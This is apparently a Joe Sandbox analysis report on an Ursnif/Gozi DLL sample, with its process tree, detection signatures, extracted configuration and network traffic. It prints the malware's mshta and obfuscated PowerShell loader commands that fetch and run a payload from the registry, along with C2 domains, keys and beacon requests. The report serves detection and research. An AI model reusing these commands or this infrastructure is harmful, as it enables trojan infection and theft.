Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 6.png

Overview

General Information

Sample Name:6.png (renamed file extension from png to dll)
Analysis ID:539457
MD5:ac57d694b86d8532b38d3d62f6de3afc
SHA1:c858ec742ba91bf8c139b7bb654ca2d67747c5ef
SHA256:fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
Tags:dllexegeofencedGoziisfbITAursnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6360 cmdline: loaddll32.exe "C:\Users\user\Desktop\6.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6400 cmdline: rundll32.exe "C:\Users\user\Desktop\6.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 3492 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6388 cmdline: regsvr32.exe /s C:\Users\user\Desktop\6.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 4912 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • rundll32.exe (PID: 6424 cmdline: rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 6580 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • BackgroundTransferHost.exe (PID: 5876 cmdline: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1 MD5: 02BA81746B929ECC9DB6665589B68335)
  • mshta.exe (PID: 4036 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 1488 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7012 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6552 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3620 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
  • mshta.exe (PID: 3696 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6188 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 496 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6540 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 27 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
            Sigma detected: Suspicious Call by OrdinalShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\6.dll",#1, ProcessId: 6400
            Sigma detected: Mshta Spawning Windows ShellShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
            Sigma detected: Suspicious Csc.exe Source File FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7012, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline, ProcessId: 6552
            Sigma detected: Suspicious Rundll32 ActivityShow sources
            Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 3492
            Sigma detected: Non Interactive PowerShellShow sources
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4036, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 7132
            Sigma detected: T1086 PowerShell ExecutionShow sources
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132839804557459233.7132.DefaultAppDomain.powershell

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000004.00000002.913785412.0000000000D60000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
            Machine Learning detection for sampleShow sources
            Source: 6.dllJoe Sandbox ML: detected
            Source: 6.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: berukoneru.website
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 79.110.52.144 187Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: windows.update3.com
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 18.219.227.107 187Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 3.12.124.139 187Jump to behavior
            Source: Joe Sandbox ViewASN Name: V4ESCROW-ASRO V4ESCROW-ASRO
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
            Source: global trafficHTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
